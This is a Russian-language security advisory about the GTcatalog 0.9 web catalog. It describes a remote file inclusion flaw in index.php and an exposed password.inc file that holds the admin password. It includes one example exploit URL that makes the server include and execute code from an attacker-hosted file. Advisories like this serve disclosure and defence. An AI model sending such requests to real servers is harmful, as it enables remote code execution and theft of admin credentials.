Выполнение произвольного кода в 'gtcatalog'

Дата публикации:
06.03.2003
Дата изменения:
17.10.2006
Всего просмотров:
2781
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
GTcatalog 0.x
Описание: Уязвимость включения файла обнаружена в 'gtcatalog'. Удаленный пользователь может выполнить произвольные команды на уязвимом сервере. Также удаленный пользователь может раскрыть пароль администратора системы.

Frog-m@n сообщил, что удаленный пользователь может загрузить 'password.inc' файл, который содержит пароль администратора системы в $$globalpw переменной.

Также сообщается, что сценарий index.php включает *.custom.inc файл, используя переменную '$custom', но не проверяет правильность включаемого файла. Удаленный пользователь может определить удаленное местоположение для *.custom.inc файла, который будет включен и выполнен целевым сервером. Пример:

http://[target]/index.php?function=custom&custom=http://[attacker]/1
где http://[attacker]/1.custom.inc
Уязвимость обнаружена в 'gtcatalog' 0.9

Ссылки: GtCatalog Bug
или введите имя

CAPTCHA